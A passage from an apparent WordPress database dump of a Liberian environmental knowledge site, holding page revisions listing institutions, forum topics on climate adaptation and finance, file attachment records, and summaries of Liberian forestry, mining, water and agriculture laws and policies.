18:43:01','',1544,'https://ekmsliberia.info/1544-revision-v1/',0,'revision','',0),(1673,1,'2019-11-10 18:45:59','2019-11-10 18:45:59','<h2>Institutions</h2>		\n	<a href=\"https://ekmsliberia.info/resource-type/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/conservation-international/\">Conservation International</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-national-bureau-of-concessions/\">Liberia National Bureau of Concessions</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-agriculture/\">Ministry of Agriculture</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\">Environmental Protection Agency</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>\n			<h2>Institutions</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-10 18:45:59','2019-11-10 18:45:59','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(1674,1,'2019-11-10 18:47:46','2019-11-10 18:47:46','<h2>Institutions</h2>		\n	<a href=\"https://ekmsliberia.info/resource-type/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/conservation-international/\">Conservation International</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-national-bureau-of-concessions/\">Liberia National Bureau of Concessions</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-agriculture/\">Ministry of Agriculture</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\">Environmental Protection Agency</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>\n			<h2>Institutions</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-10 18:47:46','2019-11-10 18:47:46','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(1675,1,'2019-11-10 18:50:15','2019-11-10 18:50:15','<h2>Institutions</h2>		\n	<a href=\"https://ekmsliberia.info/resource-type/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\">Fauna & Flora International</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/international/\">International</a><h4><a href=\"https://ekmsliberia.info/institution/conservation-international/\">Conservation International</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-national-bureau-of-concessions/\">Liberia National Bureau of Concessions</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\">Liberia Land Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-agriculture/\">Ministry of Agriculture</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-transport/\">Ministry of Transport</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/national-fisheries-aquaculture-authority/\">National Fisheries & Aquaculture Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\">Forestry Development Authority</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\">Environmental Protection Agency</a></h4>\n	<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a><h4><a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>\n			<h2>Institutions</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-10 18:50:15','2019-11-10 18:50:15','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(1678,1,'2019-11-10 18:58:23','2019-11-10 18:58:23','<h2>Institutions</h2>\n<a href=\"https://ekmsliberia.info/resource-type/international/\">International</a>\n<h4><a href=\"https://ekmsliberia.info/institution/fauna-flora-international/\">Fauna &amp; Flora International</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/international/\">International</a>\n<h4><a href=\"https://ekmsliberia.info/institution/conservation-international/\">Conservation International</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/ministry-of-internal-affairs/\">Ministry of Internal Affairs</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/ministry-of-mines-and-energy/\">Ministry of Mines and Energy</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/liberia-maritime-authority/\">Liberia Maritime Authority</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/liberia-national-bureau-of-concessions/\">Liberia National Bureau of Concessions</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/liberia-land-authority/\">Liberia Land Authority</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/ministry-of-agriculture/\">Ministry of Agriculture</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/ministry-of-transport/\">Ministry of Transport</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/liberia-airport-authority/\">Liberia Airport Authority</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/ministry-of-public-works/\">Ministry of Public Works</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/central-agricultural-research-institute/\">Central Agricultural Research Institute</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/national-legislature-on-natural-resource-committee/\">National Legislature on Natural Resource Committee</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/national-fisheries-aquaculture-authority/\">National Fisheries &amp; Aquaculture Authority</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/forestry-development-authority/\">Forestry Development Authority</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/ministry-of-gender-children-and-social-protection/\">Ministry of Gender, Children and Social Protection</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\">Environmental Protection Agency</a></h4>\n<a href=\"https://ekmsliberia.info/resource-type/government/\">Government</a>\n<h4><a href=\"https://ekmsliberia.info/institution/liberia-institute-for-statistics-and-geo-information-services/\">Liberia Institute for Statistics and Geo-Information Services</a></h4>\n<h2>Institutions</h2>','Institutions Resources','','inherit','closed','closed','','89-revision-v1','','','2019-11-10 18:58:23','2019-11-10 18:58:23','',89,'https://ekmsliberia.info/89-revision-v1/',0,'revision','',0),(1679,1,'2019-11-05 12:23:06','2019-11-05 12:23:06','Adaptation refers to adjustments in ecological, social, or economic systems in response to actual or expected climatic stimuli and their effects or impacts. It refers to changes in processes, practices, and structures to moderate potential damages or to benefit from opportunities associated with climate change.The key focus of climate resilience efforts is to address the vulnerability that communities, states, and countries currently have with regards to the many consequences of climate change. Currently, climate resilience efforts encompass social, economic, technological, and political strategies that are being implemented at all scales of society.','Adaptation and Resilience','','publish','closed','closed','','adaptation-and-resilience-2','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',0,'https://ekmsliberia.info/forums/topic/adaptation-and-resilience-2/',0,'topic','',0),(1681,1,'2019-11-05 12:23:53','2019-11-05 12:23:53','Capacity-building is fundamental to achieving the objectives of the three Conventions. It enables individuals, organizations and societies to mitigate and adapt to climate change.','Capacity Building','','publish','closed','closed','','capacity-building','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',0,'https://ekmsliberia.info/forums/topic/capacity-building/',0,'topic','',0),(1683,1,'2019-11-05 12:25:45','2019-11-05 12:25:45','Climate Finance refers to local, national or transnational financing—drawn from public, private and alternative sources of financing—that seeks to support mitigation and adaptation actions that will address climate change.','Climate Finance','','publish','closed','closed','','climate-finance','','','2019-11-14 19:49:51','2019-11-14 19:49:51','',0,'https://ekmsliberia.info/forums/topic/climate-finance/',0,'topic','',0),(1686,1,'2019-11-10 19:11:38','2019-11-10 19:11:38','','pdf','','inherit','open','closed','','pdf','','','2019-11-10 19:13:28','2019-11-10 19:13:28','',570,'https://ekmsliberia.info/wp-content/uploads/2019/11/pdf.png',0,'attachment','image/png',0),(1687,1,'2019-11-10 19:11:39','2019-11-10 19:11:39','','jpg','','inherit','open','closed','','jpg','','','2019-11-10 19:11:39','2019-11-10 19:11:39','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/jpg.png',0,'attachment','image/png',0),(1688,1,'2019-11-10 19:11:40','2019-11-10 19:11:40','','png','','inherit','open','closed','','png','','','2019-11-10 19:11:40','2019-11-10 19:11:40','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/png.png',0,'attachment','image/png',0),(1689,1,'2019-11-10 19:11:41','2019-11-10 19:11:41','','ppt','','inherit','open','closed','','ppt','','','2020-12-02 09:56:14','2020-12-02 09:56:14','',3240,'https://ekmsliberia.info/wp-content/uploads/2019/11/ppt.png',0,'attachment','image/png',0),(1690,1,'2019-11-10 19:11:42','2019-11-10 19:11:42','','xls','','inherit','open','closed','','xls','','','2019-11-10 19:11:42','2019-11-10 19:11:42','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/xls.png',0,'attachment','image/png',0),(1691,1,'2019-11-10 19:11:43','2019-11-10 19:11:43','','zip','','inherit','open','closed','','zip','','','2019-11-10 21:12:07','2019-11-10 21:12:07','',1713,'https://ekmsliberia.info/wp-content/uploads/2019/11/zip.png',0,'attachment','image/png',0),(1692,1,'2019-11-10 19:11:44','2019-11-10 19:11:44','','mp4','','inherit','open','closed','','mp4','','','2019-11-10 19:11:44','2019-11-10 19:11:44','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/mp4.png',0,'attachment','image/png',0),(1693,1,'2019-11-10 19:11:45','2019-11-10 19:11:45','','avi','','inherit','open','closed','','avi','','','2019-11-10 19:11:45','2019-11-10 19:11:45','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/avi.png',0,'attachment','image/png',0),(1694,1,'2019-11-10 19:11:46','2019-11-10 19:11:46','','doc','','inherit','open','closed','','doc','','','2019-11-10 20:23:41','2019-11-10 20:23:41','',1699,'https://ekmsliberia.info/wp-content/uploads/2019/11/doc.png',0,'attachment','image/png',0),(1695,1,'2019-11-10 20:07:06','2019-11-10 20:07:06','This Sixth National Report of Liberia to the CBD is organized into 7 sections, excluding the introduction. Section I presents and discusses the 20 National Targets that are being pursued, as embodied in the Revised National Biodiversity Strategy and Action Plan (NBSAP 2017). It also defines the rationale for each National Target, matches each National Target with its most relevant Aichi Biodiversity Target, and lists pertinent websites, web links and files, as among the key deliverables.','Sixth National CBD Report','','publish','closed','closed','','sixth-national-cbd-report','','','2022-07-28 14:05:30','2022-07-28 14:05:30','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1695',183,'document','',0),(1696,1,'2019-11-10 20:01:11','2019-11-10 20:01:11','','6th National CBD Report','','inherit','open','closed','','6th-national-cbd-report','','','2019-11-10 20:01:11','2019-11-10 20:01:11','',1695,'https://ekmsliberia.info/wp-content/uploads/2019/11/6th-National-CBD-Report.pdf',0,'attachment','application/pdf',0),(1697,1,'2019-11-10 20:18:13','2019-11-10 20:18:13','An act enacted by the Senate and House of Representatives of the Republic of Liberia.','Forestry Development Authority Act','','publish','closed','closed','','forestry-development-authority-act','','','2022-07-28 14:08:51','2022-07-28 14:08:51','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1697',182,'document','',0),(1698,1,'2019-11-10 20:17:15','2019-11-10 20:17:15','','FDA 1976','','inherit','open','closed','','fda-1976','','','2019-11-10 20:17:15','2019-11-10 20:17:15','',1697,'https://ekmsliberia.info/wp-content/uploads/2019/11/FDA-1976.pdf',0,'attachment','application/pdf',0),(1699,1,'2019-11-10 20:23:41','2019-11-10 20:23:41','In 2004, Liberia initiated a forest sector reform process, which included a review of all existing logging concession claims. This required a review of all laws and regulations relating to forestry, as well as the forest policy and management strategies. The action gathered momentum with the enactment of new forestry legislation, the redrafting and adoption of regulations for implementation, the development of a new forest policy and the formulation of a new forest management strategy.','Forestry Laws Summaries','','publish','closed','closed','','forestry-laws-summaries','','','2022-07-28 14:11:34','2022-07-28 14:11:34','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1699',181,'document','',0),(1700,1,'2019-11-10 20:22:19','2019-11-10 20:22:19','','Forestry Laws Summaries','','inherit','open','closed','','forestry-laws-summaries','','','2019-11-10 20:22:19','2019-11-10 20:22:19','',1699,'https://ekmsliberia.info/wp-content/uploads/2019/11/Forestry-Laws-Summaries.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(1701,1,'2019-11-10 20:28:30','2019-11-10 20:28:30','Mutual Beneficial Programme, Projects and participation have the potential to yield benefits for Liberia. It is against this background that a Mining Policy has been developed to create an enabling environment for the facilitation of programmes and projects. Liberia is blessed with mineral wealth and as a result the mining sector is making a significant contribution towards the economic revitalization of the country. The advantage of offering a coordinated policy Framework is that international economic relations are increased and regional and international trade enhanced.','Mineral Policy of Liberia','','publish','closed','closed','','mineral-policy-of-liberia','','','2022-07-28 14:13:29','2022-07-28 14:13:29','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1701',180,'document','',0),(1702,1,'2019-11-10 20:27:27','2019-11-10 20:27:27','','Liberia Forest Policy','','inherit','open','closed','','liberia-forest-policy','','','2019-11-10 20:27:27','2019-11-10 20:27:27','',1701,'https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-Forest-Policy.pdf',0,'attachment','application/pdf',0),(1703,1,'2019-11-10 20:32:13','2019-11-10 20:32:13','Liberia is situated within the tropical rain forest belt on the West Coast of Africa. The total land area is 9.58 million hectares, of which forests cover about 4.30 million hectares or 45 percent of the land area (see Table 1). In recent years, the forest area has decreased somewhat, largely due to uncontrolled logging and an expansion of land used for agriculture. The annual rate of deforestation is currently estimated to be about 12,000 hectares (0.3 percent), while the recorded planting of new forests to date has amounted to only about 11,000 hectares in total.','National Forestry Policy and Implementation Strategy','','publish','closed','closed','','national-forestry-policy-and-implementation-strategy','','','2022-07-28 14:15:44','2022-07-28 14:15:44','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1703',179,'document','',0),(1704,1,'2019-11-10 20:31:26','2019-11-10 20:31:26','','Liberia Forest Policy','','inherit','open','closed','','liberia-forest-policy-2','','','2019-11-10 20:31:26','2019-11-10 20:31:26','',1703,'https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-Forest-Policy-1.pdf',0,'attachment','application/pdf',0),(1705,1,'2019-11-10 20:37:25','2019-11-10 20:37:25','THIS IS AN ACT ADOPTING A NEW MINERALS AND MINING LAW, PART 1, TITLE 23, LIBERIAN CODE OF LAWS REVISED, APPROVED APRIL 3, 2000, PUBLISHED BY AUTHORITY, MINISTRY OF FOREIGN AFFAIRS, SEPTEMBER 20, 2000.','An Act Adopting a New Minerals and Mining Law','','publish','closed','closed','','an-act-adopting-a-new-minerals-and-mining-law','','','2022-07-28 14:19:42','2022-07-28 14:19:42','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1705',178,'document','',0),(1706,1,'2019-11-10 20:35:36','2019-11-10 20:35:36','','Liberia Mining Law (2000).pdf (1)','','inherit','open','closed','','liberia-mining-law-2000-pdf-1','','','2019-11-10 20:35:36','2019-11-10 20:35:36','',1705,'https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-Mining-Law-2000.pdf-1.pdf',0,'attachment','application/pdf',0),(1707,1,'2019-11-10 20:50:50','2019-11-10 20:50:50','AN ACT ADOPTING THE NATIONAL FORESTRY REFORM LAW OF 2006 (AMENDING THE NATIONAL FORESTRY LAW OF 2000, AS AMENDED; AND AMENDING AN ACT CREATING THE FORESTRY DEVELOPMENT AUTHORITY, AS AMENDED)','An Act Adopting a New Forestry Reform Law','','publish','closed','closed','','an-act-adopting-a-new-forestry-reform-law','','','2022-07-28 14:22:11','2022-07-28 14:22:11','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1707',177,'document','',0),(1708,1,'2019-11-10 20:48:21','2019-11-10 20:48:21','','Liberia_forestry_reform_law','','inherit','open','closed','','liberia_forestry_reform_law','','','2019-11-10 20:48:21','2019-11-10 20:48:21','',1707,'https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia_forestry_reform_law.pdf',0,'attachment','application/pdf',0),(1709,1,'2019-11-10 20:56:01','2019-11-10 20:56:01','This work is a product of the staff of The World Bank. The findings, interpretations, and conclusions expressed in this work do not necessarily reflect the views of the Executive Directors of The World Bank or the governments they represent. The World Bank does not guarantee the accuracy of the data included in this work. The boundaries, colors, denominations, and other information shown on any map in this work do not imply any judgment on the part of The World Bank concerning the legal status of any territory or the endorsement or acceptance of such boundaries.','Liberia: Country Forest Note','','publish','closed','closed','','liberia-country-forest-note','','','2022-07-28 14:39:52','2022-07-28 14:39:52','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1709',176,'document','',0),(1710,1,'2019-11-10 20:54:24','2019-11-10 20:54:24','','Liberia-Country-Forest-Note','','inherit','open','closed','','liberia-country-forest-note','','','2019-11-10 20:54:24','2019-11-10 20:54:24','',1709,'https://ekmsliberia.info/wp-content/uploads/2019/11/Liberia-Country-Forest-Note.pdf',0,'attachment','application/pdf',0),(1711,1,'2019-11-10 21:00:54','2019-11-10 21:00:54','Liberia is endowed with abundant rainfall and easily accessible groundwater in most areas. Its fresh water, like everywhere else globally, is a natural resource vital for human survival, socio-economic development and maintenance of the environment. The resource is finite and vulnerable and there are already worrying cases of pollution and degradation of national water resources afflicted by both natural and human factors.\r\n\r\nThe water resource potential of the country is enormous but lacks adequate and proper management. This situation has been exacerbated by the effects of the civil war just ended.\r\nThere is, therefore, a compelling need for a well coordinated and integrated approach for the development and management of the nation’s water resources (Integrated Water Resources Management). Moreover, a framework is required through which priorities can be established and the protection and optimal use of the water resources planned and implemented.\r\n\r\nAlong with the poor access to adequate sanitation and the contamination of water bodies by domestic waste, the Government is concerned that most of its population does not have access to clean and safe drinking water. The major challenge is to ensure that this social service is delivered to everyone.\r\n\r\nThe country’s reconstruction program and the need for environmental management demand that attention be paid to the problems of water resources management. These resources can be harnessed to make a significant contribution to the national economy thereby making the benefits accessible to the citizenry of Liberia.\r\n\r\nThe urgency for an integrated approach to water resources management with full coordination between the water related sectors cannot be over-stated. Unlike in the past, Liberia now has its first comprehensive National Integrated Water Resources Management Policy.\r\n\r\nThis policy will guide development efforts aimed at achieving the maximum net benefit from these resources in a sustainable manner for the livelihood of present and future generations. It also addresses current water management issues and adopts the objectives and strategies envisaged in the Millennium Development Goals. In addition, the policy and strategies have been set against the Government\'s overall goals for social and economic development, as well as the democratic, decentralization approach to development.\r\n\r\nThe sustainable development and national utilization of the water resources are our collective responsibility; it requires commitment, political will and shared vision.','National Integrated Water Resources Management Policy','','publish','closed','closed','','national-integrated-water-resources-management-policy','','','2022-12-06 10:40:30','2022-12-06 10:40:30','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1711',175,'document','',0),(1712,1,'2019-11-10 20:59:54','2019-11-10 20:59:54','','National-Integrated-Water-Resources-Management-Policy','','inherit','open','closed','','national-integrated-water-resources-management-policy','','','2019-11-10 20:59:54','2019-11-10 20:59:54','',1711,'https://ekmsliberia.info/wp-content/uploads/2019/11/National-Integrated-Water-Resources-Management-Policy.pdf',0,'attachment','application/pdf',0),(1713,1,'2019-11-10 21:12:07','2019-11-10 21:12:07','This zip file consist of various FDA regulations in Liberia including Wildlife export, Charcoal, Power saw ban, etc.','FDA Regulations','','publish','closed','closed','','fda-regulations','','','2022-12-06 10:39:59','2022-12-06 10:39:59','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1713',174,'document','',0),(1714,1,'2019-11-10 21:11:26','2019-11-10 21:11:26','','Regulations_FDA','','inherit','open','closed','','regulations_fda','','','2019-11-10 21:11:26','2019-11-10 21:11:26','',1713,'https://ekmsliberia.info/wp-content/uploads/2019/11/Regulations_FDA.zip',0,'attachment','application/zip',0),(1715,1,'2019-11-10 21:20:58','2019-11-10 21:20:58','Purpose of Act: It shall be the purpose of this Chapter to prevent entry into Liberia of injurious plant and animal pests and diseases existing in foreign countries; to prevent the spread of such pests and diseases should they become established in Liberia; and to regulate the export of plants and animals to conserve dwindling species and protect the food supplies of the Republic.','Agriculture Law - Title 3 - Liberian Code of Laws Revised','','publish','closed','closed','','agriculture-law-title-3-liberian-code-of-laws-revised','','','2022-12-06 10:42:26','2022-12-06 10:42:26','',0,'https://ekmsliberia.info/?post_type=document&#038;p=1715',173,'document','',0),(1716,1,'2019-11-10 21:18:24','2019-11-10 21:18:24','','1973-–-agriculture-law-ext-fr','','inherit','open','closed','','1973-agriculture-law-ext-fr','','','2019-11-10 21:18:24','2019-11-10 21:18:24','',1715,'https://ekmsliberia.info/wp-content/uploads/2019/11/1973-–-agriculture-law-ext-fr.pdf',0,'attachment','application/pdf',0),(1717,1,'2019-11-10 21:23:01','2019-11-10 21:23:01','','Environmental Impact Assessment Procedural Guidelines','','inherit','closed','closed','','1715-autosave-v1','','','2019-11-10 21:23:01','2019-11-10 21:23:01','',1715,'https://ekmsliberia.info/1715-autosave-v1/',0,'revision','',0),(1718,1,'2019-11-10 21:29:18','2019-11-10 21:29:18','This manual is a result of the joint effort of the Environmental Protection Agency and the national stakeholders including line ministries/agencies and the private sectors. The intention is to provide the EPA, sector agencies, private sector, NGOs, members of the public and consultants a set of approved guidelines for the conduct and review of Environmental Impact Assessments (EIA) in Liberia.\r\n\r\nThe need to have clear guidance on the EIA process has been evident since the establishment of the EPA. EIA is a means of identifying and planning for the avoidance or minimization of environmental impacts that may arise from development and exploitation of resources, and ensuring sustainable development. It will also be customized to reflect issues that are relevant and specific to projects. While not exhaustive, the guidelines are meant to complement other sectoral EIA guidelines which may be produced by the EPA from time to time.\r\n\r\nThe Environmental Protection and Management Law (EPML) provide for a wide ranging responsibility for environmental management by the EPA. One of the most prominent issues is the need for development of administrative procedures for the preparation of EIA to ensure effective environmental governance. The required administrative procedures and how they are arranged to reflect the intent of the law is the subject of the following guidelines. These Guidelines will be reviewed periodically when necessary.','Environmental Impact Assessment Procedural 